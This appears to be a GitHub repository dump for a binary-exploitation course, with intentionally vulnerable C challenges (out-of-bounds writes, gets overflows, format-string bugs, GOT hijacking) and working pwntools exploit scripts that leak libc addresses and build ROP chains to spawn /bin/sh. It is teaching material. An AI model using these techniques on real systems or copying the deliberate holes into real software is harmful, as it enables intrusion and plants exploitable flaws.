├── GOThijack └── challenge │ ├── .gdb_history │ ├── chal │ ├── chal.c │ ├── exploit.py │ └── libc.so.6 ├── LICENSE ├── OOB ├── challenge │ ├── .gdb_history │ ├── chal │ ├── chal.c │ └── exploit.py └── demo │ ├── .gdb_history │ ├── demo1 │ ├── demo1.c │ ├── demo2 │ └── demo2.c ├── Onegadget └── challenge │ ├── .gdb_history │ ├── chal │ ├── chal.c │ ├── exploit.py │ └── libc.so.6 ├── README.md ├── ROP └── challenge │ ├── .gdb_history │ ├── chal │ ├── chal.c │ └── exploit.py ├── fmt ├── challenge_aar │ ├── .gdb_history │ ├── chal │ ├── chal.c │ └── exploit.py ├── challenge_aaw │ ├── chal │ ├── chal.c │ └── exploit.py ├── challenge_argvchain │ ├── .gdb_history │ ├── chal │ ├── chal.c │ └── exploit.py └── demo │ ├── .gdb_history │ ├── demo1 │ ├── demo1.c │ ├── demo2 │ └── demo2.c ├── heap_overflow └── challenge │ ├── chal │ ├── chal.c │ └── exploit.py ├── ret2func └── challenge │ ├── .gdb_history │ ├── chal │ ├── chal.c │ └── exploit.py ├── ret2libc └── challenge │ ├── .gdb_history │ ├── chal │ ├── chal.c │ ├── exploit.py │ └── libc.so.6 ├── ret2plt └── challenge │ ├── .gdb_history │ ├── chal │ ├── chal.c │ └── exploit.py ├── ret2shellcode ├── challenge │ ├── .gdb_history │ ├── chal │ ├── chal.c │ └── exploit.py └── demo │ ├── .gdb_history │ ├── demo │ └── demo.c └── stack_migration └── challenge ├── .gdb_history ├── chal ├── chal.c └── exploit.py /GOThijack/challenge/.gdb_history: -------------------------------------------------------------------------------- 1 | b main 2 | r 3 | got 4 | vmmap 5 | x/60xg 0x555555554000+0x4030 6 | q 7 | b main 8 | r 9 | ni 10 | got 11 | x/60xg 0x555555554000+0x4030 12 | q 13 | b main 14 | disassemble mai 15 | disassemble main 16 | qq 17 | q 18 | -------------------------------------------------------------------------------- /GOThijack/challenge/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Naupjjin/My-Course-Binary-exploitation-challenge/7d74e4bd5bc0ac487ff09cc9e0f7f67b5c64d875/GOThijack/challenge/chal -------------------------------------------------------------------------------- /GOThijack/challenge/chal.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | // gcc chal.c -o chal -z lazy 5 | 6 | unsigned long long array[0x100]; 7 | 8 | void init() 9 | { 10 | setvbuf(stdin, 0, _IONBF, 0); 11 | setvbuf(stdout, 0, _IONBF, 0); 12 | } 13 | 14 | void menu() 15 | { 16 | printf("1: set\n"); 17 | printf("2: get\n"); 18 | } 19 | 20 | int main() 21 | { 22 | char buf[0x100] = { 0 }; 23 | int choice; 24 | int idx; 25 | unsigned long long value; 26 | 27 | init(); 28 | 29 | while (1) { 30 | menu(); 31 | scanf("%256s", buf); 32 | choice = atoi(buf); 33 | 34 | printf("idx:\n"); 35 | scanf("%d", &idx); 36 | 37 | if (choice == 1) { 38 | printf("value:\n"); 39 | scanf("%llu", &value); 40 | array[idx] = value; 41 | } else if (choice == 2) { 42 | printf("%#llx\n", array[idx]); 43 | } 44 | } 45 | 46 | exit(1); 47 | } 48 | -------------------------------------------------------------------------------- /GOThijack/challenge/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | r=process("./chal") 4 | 5 | debug = input("(Y/N)") 6 | if debug == "Y" or debug == "y": 7 | context.log_level = 'debug' 8 | context.terminal = ['tmux', 'splitw', '-h'] 9 | gdb.attach(r) 10 | 11 | ''' 12 | 929: 0000000000043640 25 FUNC GLOBAL DEFAULT 15 atoi@@GLIBC_2.2.5 13 | 1481: 0000000000050d70 45 FUNC WEAK DEFAULT 15 system@@GLIBC_2.2.5 14 | 15 | rdx,[rax*8+0x0] 16 | 17 | when execuse atoi plt -> 0x555555558030 : 0x00007ffff7c43640 18 | 19 | 0x555555558030 : 0x0000555555555060 0x0000555555555070 20 | 0x555555558040: 0x0000000000000000 0x0000555555558048 21 | 0x555555558050: 0x0000000000000000 0x0000000000000000 22 | 0x555555558060 : 0x00007ffff7e1b780 0x0000000000000000 23 | 0x555555558070 : 0x00007ffff7e1aaa0 0x0000000000000000 24 | 0x555555558080 : 0x0000000000000000 0x0000000000000000 25 | 0x555555558090 : 0x0000000000000000 0x0000000000000000 26 | ''' 27 | 28 | r.sendlineafter(b'2: get\n',b'2') 29 | r.sendlineafter(b'idx:\n',b'-10') 30 | 31 | leaklibc=int(r.recvline().strip().decode(),16) 32 | offset=0x43640 33 | libc_base=leaklibc-offset 34 | 35 | print('NAUPINFO@LEAK_LIBC',hex(leaklibc)) 36 | print('NAUPINFO@LIBC_BASE',hex(libc_base)) 37 | 38 | system_offset=0x50d70 39 | libc_system=system_offset+libc_base 40 | 41 | r.sendlineafter(b'2: get\n',b'1') 42 | r.sendlineafter(b'idx:\n',b'-10') 43 | r.sendlineafter(b'value:\n',str(libc_system).encode()) 44 | 45 | r.sendline(b'/bin/sh') # rdi id /bin/sh 46 | 47 | r.interactive() 48 | -------------------------------------------------------------------------------- /GOThijack/challenge/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Naupjjin/My-Course-Binary-exploitation-challenge/7d74e4bd5bc0ac487ff09cc9e0f7f67b5c64d875/GOThijack/challenge/libc.so.6 -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2025 堇姬 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /OOB/challenge/.gdb_history: -------------------------------------------------------------------------------- 1 | b main 2 | r 3 | ni 4 | r 5 | ni 6 | si 7 | ni 8 | q 9 | b main 10 | r 11 | ni 12 | q 13 | b main 14 | r 15 | ni 16 | ni 17 | stack 18 | ni 19 | q 20 | p win 21 | q 22 | fin 23 | ni 24 | q 25 | -------------------------------------------------------------------------------- /OOB/challenge/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Naupjjin/My-Course-Binary-exploitation-challenge/7d74e4bd5bc0ac487ff09cc9e0f7f67b5c64d875/OOB/challenge/chal -------------------------------------------------------------------------------- /OOB/challenge/chal.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | // gcc chal.c -o chal -fno-stack-protector -no-pie 5 | 6 | void win() { 7 | system("/bin/sh"); 8 | } 9 | 10 | int main() { 11 | printf("Welcome to the 8-byte OOB PWN challenge!\n"); 12 | long arr[5] = {80,60,70,90,100}; 13 | printf("Enter an index to write: "); 14 | 15 | int index; 16 | scanf("%d", &index); 17 | 18 | printf("Enter a value to write (hex): "); 19 | long value; 20 | scanf("%lx", &value); 21 | 22 | arr[index] = value; 23 | 24 | printf("Done! Array[%d] = 0x%lx\n", index, value); 25 | printf("Goodbye!\n"); 26 | 27 | return 0; 28 | } 29 | -------------------------------------------------------------------------------- /OOB/challenge/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | 4 | r=process("./chal") 5 | 6 | #context.log_level = 'debug' 7 | #context.terminal = ['tmux', 'splitw', '-h'] 8 | #gdb.attach(r) 9 | 10 | r.sendline(b'7') 11 | r.sendline(b'000000000040119b') 12 | 13 | 14 | r.interactive() 15 | -------------------------------------------------------------------------------- /OOB/demo/.gdb_history: -------------------------------------------------------------------------------- 1 | b main 2 | r 3 | ni 4 | r 5 | ni 6 | x/10xg 0x7fffffffdda0-0x24 7 | x/10xb 0x7fffffffdda0-0x24 8 | x/10xw 0x7fffffffdda0-0x24 9 | x/10xw 0x7fffffffdda0-0x1c 10 | x/10xw 0x7fffffffdda0-0x20 11 | x/10s 0x7fffffffdda0-0x20 12 | x/10c 0x7fffffffdda0-0x20 13 | x/10xw 0x7fffffffdda0-0x20 14 | disassemble main 15 | x/6xw 0x7fffffffdda0-0x20 16 | ni 17 | q 18 | -------------------------------------------------------------------------------- /OOB/demo/demo1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Naupjjin/My-Course-Binary-exploitation-challenge/7d74e4bd5bc0ac487ff09cc9e0f7f67b5c64d875/OOB/demo/demo1 -------------------------------------------------------------------------------- /OOB/demo/demo1.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int main() { 4 | 5 | int array[5] = {10, 20, 30, 40, 50}; 6 | for (int i = 0; i < 5; i++) { 7 | printf("array[%d] = %d\n", i, array[i]); 8 | } 9 | 10 | return 0; 11 | } 12 | -------------------------------------------------------------------------------- /OOB/demo/demo2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Naupjjin/My-Course-Binary-exploitation-challenge/7d74e4bd5bc0ac487ff09cc9e0f7f67b5c64d875/OOB/demo/demo2 -------------------------------------------------------------------------------- /OOB/demo/demo2.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int main() { 4 | 5 | int array[5] = {10, 20, 30, 40, 50}; 6 | for (int i = -10; i < 5; i++) { 7 | printf("array[%d] = %d\n", i, array[i]); 8 | } 9 | 10 | return 0; 11 | } 12 | -------------------------------------------------------------------------------- /Onegadget/challenge/.gdb_history: -------------------------------------------------------------------------------- 1 | b main 2 | q 3 | b main 4 | r 5 | ni 6 | stack 7 | q 8 | fin 9 | vmmap 10 | q 11 | b main 12 | r 13 | vmmap 14 | x/10xg 0x404550 15 | q 16 | fin 17 | ni 18 | x/10xg 0x404550 19 | q 20 | fin 21 | ni 22 | fin 23 | ni 24 | c 25 | q 26 | fin 27 | ni 28 | q 29 | fin 30 | ni 31 | q 32 | fin 33 | ni 34 | ni 35 | q 36 | y 37 | y 38 | c 39 | q 40 | q 41 | fin 42 | ni 43 | vmmap 44 | ni 45 | q 46 | b main 47 | r 48 | vmmap 49 | x/10xg 0x404560 50 | x/10xg 0x404560 -0x78 51 | q 52 | fin 53 | ni 54 | x/10i 0x761c97aebc85 55 | x/10xg 0x761c97bd8678 56 | x/2s 0x761c97bd8678 57 | x/1s 0x761c97bd8678 58 | q 59 | -------------------------------------------------------------------------------- /Onegadget/challenge/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Naupjjin/My-Course-Binary-exploitation-challenge/7d74e4bd5bc0ac487ff09cc9e0f7f67b5c64d875/Onegadget/challenge/chal -------------------------------------------------------------------------------- /Onegadget/challenge/chal.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | // gcc chal.c -o chal -fno-stack-protector -no-pie 6 | 7 | void gadget() { 8 | __asm__( 9 | "pop %r10;" 10 | "ret;" 11 | "pop %rdx;" 12 | "ret;" 13 | ); 14 | } 15 | 16 | int main(){ 17 | 18 | char buffer[0x30]; 19 | printf("GIFT: %p \n>", &printf); 20 | gets(buffer); 21 | 22 | return 0; 23 | } 24 | -------------------------------------------------------------------------------- /Onegadget/challenge/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | r=process("./chal") 4 | 5 | debug = input("(Y/N)") 6 | if debug == "Y" or debug == "y": 7 | context.log_level = 'debug' 8 | context.terminal = ['tmux', 'splitw', '-h'] 9 | gdb.attach(r) 10 | 11 | r.recvuntil(b'GIFT: ') 12 | 13 | leaklibc = int(r.recvline().strip(),16) 14 | offset = 0x606f0 15 | libcbase = leaklibc - offset 16 | 17 | ''' 18 | 0x000000000040114e : pop r10 ; ret 19 | 0x000000000040114f : pop rdx ; ret 20 | 21 | 0xebc85 execve("/bin/sh", r10, rdx) 22 | constraints: 23 | address rbp-0x78 is writable 24 | [r10] == NULL || r10 == NULL || r10 is a valid argv 25 | [rdx] == NULL || rdx == NULL || rdx is a valid envp 26 | ''' 27 | 28 | ''' 29 | 0x761c97aebc85 <__execvpe+1141>: mov rsi,r10 30 | 0x761c97aebc88 <__execvpe+1144>: lea rdi,[rip+0xec9e9] # 0x761c97bd8678 31 | 0x761c97aebc8f <__execvpe+1151>: mov QWORD PTR [rbp-0x78],r9 32 | 0x761c97aebc93 <__execvpe+1155>: call 0x761c97aeb080 33 | 34 | pwndbg> x/1s 0x761c97bd8678 35 | 0x761c97bd8678: "/bin/sh" 36 | ''' 37 | 38 | pop_r10 = 0x40114e 39 | pop_rdx = 0x40114f 40 | 41 | onegadget = libcbase + 0xebc85 42 | writable_addr = 0x404560 43 | 44 | ROPchain = p64(pop_r10) + p64(0) + p64(pop_rdx) + p64(0) + p64(onegadget) 45 | 46 | r.sendline(b'a'*(0x30) + p64(writable_addr) + ROPchain) 47 | 48 | print("NAUPINFO@LEAKLIBC:",hex(leaklibc)) 49 | print("NAUPINFO@LIBCBASE:",hex(libcbase)) 50 | print("NAUPINFO@onegadget: ",hex(onegadget)) 51 | 52 | r.interactive() 53 | -------------------------------------------------------------------------------- /Onegadget/challenge/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Naupjjin/My-Course-Binary-exploitation-challenge/7d74e4bd5bc0ac487ff09cc9e0f7f67b5c64d875/Onegadget/challenge/libc.so.6 -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Binary-exploitation 2 | > Author: 堇姬Naup 3 | 4 | ## ENV 5 | Vmware + Ubuntu 22.04 6 | 7 | ## description 8 | Provide some challenge about basic pwn challenge. 9 | 10 | ## challenge 11 | | challenge | link | 12 | |-----------|------| 13 | |OOB|[LINK](https://github.com/Naupjjin/My-Course-Binary-exploitation-challenge/tree/main/OOB/challenge)| 14 | |ret2func|[LINK](https://github.com/Naupjjin/My-Course-Binary-exploitation-challenge/tree/main/ret2func/challenge)| 15 | |ret2shellcode|[LINK](https://github.com/Naupjjin/My-Course-Binary-exploitation-challenge/tree/main/ret2shellcode/challenge)| 16 | |ROP|[LINK](https://github.com/Naupjjin/My-Course-Binary-exploitation-challenge/tree/main/ROP/challenge)| 17 | |Stack Migration|[LINK](https://github.com/Naupjjin/My-Course-Binary-exploitation-challenge/tree/main/stack_migration/challenge)| 18 | |GOT Hijack|[LINK](https://github.com/Naupjjin/My-Course-Binary-exploitation-challenge/tree/main/GOThijack/challenge)| 19 | |ret2plt|[LINK](https://github.com/Naupjjin/My-Course-Binary-exploitation-challenge/tree/main/ret2plt/challenge)| 20 | |ret2libc|[LINK](https://github.com/Naupjjin/My-Course-Binary-exploitation-challenge/tree/main/ret2libc/challenge)| 21 | |One Gadget|[LINK](https://github.com/Naupjjin/My-Course-Binary-exploitation-challenge/tree/main/Onegadget/challenge)| 22 | |FMT-AAR|[LINK](https://github.com/Naupjjin/My-Course-Binary-exploitation-challenge/tree/main/fmt/challenge_aar)| 23 | |FMT-AAW|[LINK](https://github.com/Naupjjin/My-Course-Binary-exploitation-challenge/tree/main/fmt/challenge_aaw)| 24 | |FMT-argvchain|[LINK](https://github.com/Naupjjin/My-Course-Binary-exploitation-challenge/tree/main/fmt/challenge_argvchain)| 25 | |Heap Overflow|[LINK](https://github.com/Naupjjin/My-Course-Binary-exploitation-challenge/tree/main/heap_overflow/challenge)| 26 | -------------------------------------------------------------------------------- /ROP/challenge/.gdb_history: -------------------------------------------------------------------------------- 1 | q 2 | b main 3 | r 4 | vmmap 5 | x/10xg 0x4c6530 6 | x/10xg 0x4c7530 7 | x/10xg 0x4c7a30 8 | q 9 | fin 10 | ni 11 | q 12 | fin 13 | q 14 | fin 15 | q 16 | c 17 | q 18 | fin 19 | ni 20 | q 21 | -------------------------------------------------------------------------------- /ROP/challenge/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Naupjjin/My-Course-Binary-exploitation-challenge/7d74e4bd5bc0ac487ff09cc9e0f7f67b5c64d875/ROP/challenge/chal -------------------------------------------------------------------------------- /ROP/challenge/chal.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | // gcc chal.c -o chal -fno-stack-protector -no-pie --static 4 | int main(){ 5 | char buffer[8]; 6 | printf("Go!!!! "); 7 | gets(buffer); 8 | return 0; 9 | } 10 | -------------------------------------------------------------------------------- /ROP/challenge/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | r=process("./chal") 4 | ''' 5 | 0x000000000044fc47 : pop rax ; ret 6 | 0x0000000000401e4f : pop rdi ; ret 7 | 0x0000000000409ebe : pop rsi ; ret 8 | 0x00000000004859cb : pop rdx ; pop rbx ; ret 9 | 0x0000000000487dca : mov qword ptr [rsi], rdx ; ret 10 | 0x0000000000401c04 : syscall 11 | ''' 12 | 13 | #context.log_level = 'debug' 14 | #context.terminal = ['tmux', 'splitw', '-h'] 15 | #gdb.attach(r) 16 | 17 | pop_rax_ret = 0x44fc47 18 | pop_rdi_ret = 0x401e4f 19 | pop_rsi_ret = 0x409ebe 20 | pop_rdx_rbx_ret = 0x4859cb 21 | 22 | mov_rdx_to_rsi_ret = 0x487dca 23 | syscall = 0x401c04 24 | 25 | binsh = 0x4c7a30 26 | 27 | ROPchain1 = p64(pop_rdx_rbx_ret) + b'/bin/sh\x00'.ljust(8,b'\x00') + p64(0) 28 | ROPchain1 += p64(pop_rsi_ret) + p64(binsh) 29 | ROPchain1 += p64(mov_rdx_to_rsi_ret) 30 | 31 | ROPchain2 = p64(pop_rax_ret)+p64(0x3b) 32 | ROPchain2 += p64(pop_rdi_ret) + p64(binsh) 33 | ROPchain2 += p64(pop_rsi_ret) + p64(0) 34 | ROPchain2 += p64(pop_rdx_rbx_ret) + p64(0) + p64(0) 35 | ROPchain2 += p64(syscall) 36 | 37 | print("BINSH: ",hex(binsh)) 38 | 39 | ROPchain = b'a' * 0x10 + ROPchain1 + ROPchain2 40 | 41 | r.sendline(ROPchain) 42 | 43 | 44 | 45 | r.interactive() 46 | -------------------------------------------------------------------------------- /fmt/challenge_aar/.gdb_history: -------------------------------------------------------------------------------- 1 | b main 2 | r 3 | ni 4 | q 5 | disassemble main 6 | b main 7 | r 8 | ni 9 | q 10 | -------------------------------------------------------------------------------- /fmt/challenge_aar/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Naupjjin/My-Course-Binary-exploitation-challenge/7d74e4bd5bc0ac487ff09cc9e0f7f67b5c64d875/fmt/challenge_aar/chal -------------------------------------------------------------------------------- /fmt/challenge_aar/chal.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int main() { 5 | setbuf(stdout, NULL); 6 | char flag[48] = "NAUPCTF{stack_fmt_leak_example}"; 7 | char input[128]; 8 | 9 | printf("Welcome to the format string challenge!\n"); 10 | printf("Can you find the flag?\n"); 11 | 12 | printf("Your input: "); 13 | fgets(input, sizeof(input), stdin); 14 | 15 | printf(input); 16 | 17 | printf("\nGoodbye!\n"); 18 | return 0; 19 | } 20 | -------------------------------------------------------------------------------- /fmt/challenge_aar/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | r=process('./chal') 4 | 5 | ''' 6 | 00:0000│ rsp 0x7fffffffdce0 ◂— 'NAUPCTF{stack_fmt_leak_example}' 7 | 01:0008│-0b8 0x7fffffffdce8 ◂— 'stack_fmt_leak_example}' 8 | 02:0010│-0b0 0x7fffffffdcf0 ◂— 't_leak_example}' 9 | ''' 10 | 11 | r.sendline(b'%6$p %7$p %8$p %9$p') 12 | r.recvuntil(b'Your input: ') 13 | flag_list = r.recvline().strip().split() 14 | 15 | finalflag = "" 16 | for i in range(4): 17 | flag = bytes.fromhex(flag_list[i][2:].decode()) 18 | finalflag += flag[::-1].decode() 19 | 20 | print(finalflag) 21 | 22 | r.interactive() 23 | -------------------------------------------------------------------------------- /fmt/challenge_aaw/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Naupjjin/My-Course-Binary-exploitation-challenge/7d74e4bd5bc0ac487ff09cc9e0f7f67b5c64d875/fmt/challenge_aaw/chal -------------------------------------------------------------------------------- /fmt/challenge_aaw/chal.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | // gcc chal.c -o chal -no-pie 8 | 9 | char secret[0x10]; 10 | 11 | int main() { 12 | setvbuf(stdin, 0, _IONBF, 0); 13 | setvbuf(stdout, 0, _IONBF, 0); 14 | 15 | int fd; 16 | char buf[0x58]; 17 | 18 | fd = open("/dev/urandom", 0); 19 | if (fd < 0) { 20 | puts("error"); 21 | exit(1); 22 | } 23 | 24 | read(fd, secret, 0x10); 25 | close(fd); 26 | 27 | printf("Input your name: "); 28 | read(0, buf, 0x20); 29 | printf(buf); 30 | 31 | printf("Input your password: "); 32 | read(0, buf, 0x20); 33 | if (strncmp(buf, secret, 0x10)) { 34 | puts("Bye!"); 35 | exit(0); 36 | } 37 | 38 | printf("You are admin!!!!!\n"); 39 | system("/bin/sh"); 40 | return 0; 41 | } 42 | -------------------------------------------------------------------------------- /fmt/challenge_aaw/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | context.arch = "amd64" 3 | 4 | DEBUG=input('open debug?(y/n)') 5 | if DEBUG=='y': 6 | context.log_level = 'debug' 7 | context.terminal = ['tmux', 'splitw', '-h'] 8 | 9 | 10 | r=process('./chal') 11 | 12 | secret = 0x4040a0 13 | 14 | payload = b"%65c%10$lln".ljust(0x10) + p64(secret) 15 | 16 | r.sendlineafter(b":", payload) 17 | r.sendafter(b":", b'A'.ljust(0x8,b'\0')) 18 | 19 | r.interactive() 20 | -------------------------------------------------------------------------------- /fmt/challenge_argvchain/.gdb_history: -------------------------------------------------------------------------------- 1 | checksec 2 | disassemble main 3 | q 4 | checksec 5 | disassemble main 6 | q 7 | checlsec 8 | checksec 9 | q 10 | b main 11 | r 12 | ni 13 | q 14 | b main 15 | r 16 | ni 17 | q 18 | fin 19 | vmmap 20 | exit 21 | b main 22 | r 23 | ni 24 | q 25 | fin 26 | ni 27 | q 28 | checkserc 29 | checksec 30 | q 31 | checksec 32 | q 33 | b main 34 | r 35 | got 36 | q 37 | p win 38 | p shell 39 | q 40 | c 41 | q 42 | fin 43 | c 44 | x/20xg 0x572ff755b290 45 | x/20xg 0x572ff755e058 46 | q 47 | fin 48 | q 49 | fon 50 | fin 51 | ni 52 | q 53 | fin 54 | q 55 | fin 56 | q 57 | fin 58 | ni 59 | ni 60 | q 61 | fin 62 | ni 63 | q 64 | fin 65 | ni 66 | ni 67 | stack 68 | exit 69 | fin 70 | ni 71 | x/2xg 0x7ffd68d62e47 72 | ni 73 | q 74 | q 75 | q 76 | fin 77 | ni 78 | q 79 | fin 80 | q 81 | fin 82 | q 83 | fin 84 | ni 85 | q 86 | fin 87 | ni 88 | vmmap 89 | ni 90 | x/10xg 0x7fffa8d68598 91 | q 92 | fin 93 | ni 94 | ni 95 | x/20xg 0x7fff00d34aca-0x2 96 | q 97 | fin 98 | ni 99 | ni 100 | x/20xg 0x7ffc5026c4dc+0x4 101 | x/20xg 0x7ffc5026c4dc-0x4 102 | q 103 | fin 104 | ni 105 | q 106 | fin 107 | ni 108 | fin 109 | q 110 | fin 111 | ni 112 | ni 113 | q 114 | fin 115 | ni 116 | ni 117 | ni 118 | q 119 | fin 120 | ni 121 | si 122 | ni 123 | si 124 | ni 125 | q 126 | -------------------------------------------------------------------------------- /fmt/challenge_argvchain/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Naupjjin/My-Course-Binary-exploitation-challenge/7d74e4bd5bc0ac487ff09cc9e0f7f67b5c64d875/fmt/challenge_argvchain/chal -------------------------------------------------------------------------------- /fmt/challenge_argvchain/chal.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | // gcc chal.c -o chal -z lazy 7 | 8 | char buf[0x30]; 9 | 10 | void init(){ 11 | setvbuf(stdin, 0, _IONBF, 0); 12 | setvbuf(stdout, 0, _IONBF, 0); 13 | } 14 | 15 | int shell(){ 16 | printf("secret place...\n"); 17 | system("/bin/sh"); 18 | } 19 | 20 | int main(){ 21 | 22 | init(); 23 | while(1){ 24 | printf(">"); 25 | ssize_t len = read(0, buf, sizeof(buf) - 1); 26 | if (len <= 0) { 27 | puts("Error reading input."); 28 | break; 29 | } 30 | 31 | buf[len] = '\0'; 32 | buf[strcspn(buf, "\n")] = '\0'; 33 | 34 | printf(buf); 35 | 36 | printf("\n"); 37 | if (strcmp(buf, "exit") == 0) { 38 | break; 39 | } 40 | } 41 | 42 | printf("end...\n"); 43 | exit(0); 44 | } 45 | -------------------------------------------------------------------------------- /fmt/challenge_argvchain/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | def s(payload): return r.send(payload) 4 | def sl(payload): return r.sendline(payload) 5 | def sla(after, payload): return r.sendlineafter(after, payload) 6 | def sa(after, payload): return r.sendafter(after, payload) 7 | def rc(num): return r.recv(num) 8 | def rcl(): return r.recvline() 9 | def rcls(num): return r.recvlines(num) 10 | def rcu(payload): return r.recvuntil(payload) 11 | def ita(): return r.interactive() 12 | def cl(): return r.close() 13 | 14 | r=process("./chal") 15 | 16 | 17 | DEBUG=input('open debug?(y/n)') 18 | if DEBUG=='y': 19 | context.log_level = 'debug' 20 | context.terminal = ['tmux', 'splitw', '-h'] 21 | gdb.attach(r) 22 | 23 | sla(b'>',b'%11$p') 24 | leakPIE = int(rcl().strip(),16) 25 | PIEbase = leakPIE-0x12b9 26 | 27 | sla(b'>',b'%13$p') 28 | leakstack = int(rcl().strip(),16) 29 | rsp = leakstack - 0x128 30 | 31 | print("NAUPINFO@LEAKPIE: ",hex(leakPIE)) 32 | print("NAUPINFO@PIEbase",hex(PIEbase)) 33 | print("NAUPINFO@LEAKSTACK: ",hex(leakstack)) 34 | print("NAUPINFO@RSP: ",hex(rsp)) 35 | 36 | exit_got = PIEbase + 0x4058 37 | win_addr = PIEbase + 0x1290 38 | 39 | print("NAUPINFO@EXITGOT: ",hex(exit_got)) 40 | print("NAUPINFO@WIN: ",hex(win_addr)) 41 | 42 | argv0 = rsp + 0x38 43 | argv1 = rsp + 0x128 44 | argv2 = rsp + 0x828 45 | 46 | ### write exit got on stack 47 | sla(b'>',b'%'+str(argv2 & 0xffff).encode() + b'c%13$hn') 48 | sla(b'>',b'%'+str(exit_got & 0xffff).encode() + b'c%43$hn') 49 | sla(b'>',b'%'+str((argv2 & 0xffff) + 0x2).encode() + b'c%13$hn') 50 | sla(b'>',b'%'+str((exit_got>>16) & 0xffff).encode() + b'c%43$hn') 51 | sla(b'>',b'%'+str((argv2 & 0xffff) + 0x4).encode() + b'c%13$hn') 52 | sla(b'>',b'%'+str((exit_got>>32) & 0xffff).encode() + b'c%43$hn') 53 | sla(b'>',b'%'+str(argv2 & 0xffff).encode() + b'c%13$hn') 54 | 55 | ### change exit got to win (just change low bit because got store plt address when it haven't been call.) 56 | sla(b'>',b'%'+str(win_addr & 0xffff).encode() + b'c%267$hn') 57 | sla(b'>',b'exit') 58 | 59 | ''' 60 | 00:0000│ rsp 0x7ffe35f605c0 ◂— 0x1000 61 | 07:0038│+028 0x7ffe35f605f8 —▸ 0x7ffe35f606e8 —▸ 0x7ffe35f60de8 62 | 13 43 267 63 | ''' 64 | 65 | ita() 66 | 67 | -------------------------------------------------------------------------------- /fmt/demo/.gdb_history: -------------------------------------------------------------------------------- 1 | b main 2 | r 3 | ni 4 | q 5 | -------------------------------------------------------------------------------- /fmt/demo/demo1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Naupjjin/My-Course-Binary-exploitation-challenge/7d74e4bd5bc0ac487ff09cc9e0f7f67b5c64d875/fmt/demo/demo1 -------------------------------------------------------------------------------- /fmt/demo/demo1.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int main() { 4 | int a = 42; 5 | char b = 'X'; 6 | char c[] = "Hello"; 7 | 8 | printf("%d %c %s\n", a, b, c); 9 | return 0; 10 | } 11 | -------------------------------------------------------------------------------- /fmt/demo/demo2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Naupjjin/My-Course-Binary-exploitation-challenge/7d74e4bd5bc0ac487ff09cc9e0f7f67b5c64d875/fmt/demo/demo2 -------------------------------------------------------------------------------- /fmt/demo/demo2.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int main() 4 | { 5 | char buffer[0x200]; 6 | gets(buffer); 7 | printf(buffer); 8 | 9 | return 0; 10 | } 11 | -------------------------------------------------------------------------------- /heap_overflow/challenge/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Naupjjin/My-Course-Binary-exploitation-challenge/7d74e4bd5bc0ac487ff09cc9e0f7f67b5c64d875/heap_overflow/challenge/chal -------------------------------------------------------------------------------- /heap_overflow/challenge/chal.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | typedef struct { 6 | char name[8]; 7 | int privilege; 8 | char *msg; 9 | char reserved[0x18]; 10 | } Info; 11 | 12 | void init() { 13 | setvbuf(stdin, 0, _IONBF, 0); 14 | setvbuf(stdout, 0, _IONBF, 0); 15 | } 16 | 17 | int main(void) { 18 | Info *info; 19 | char *msg; 20 | 21 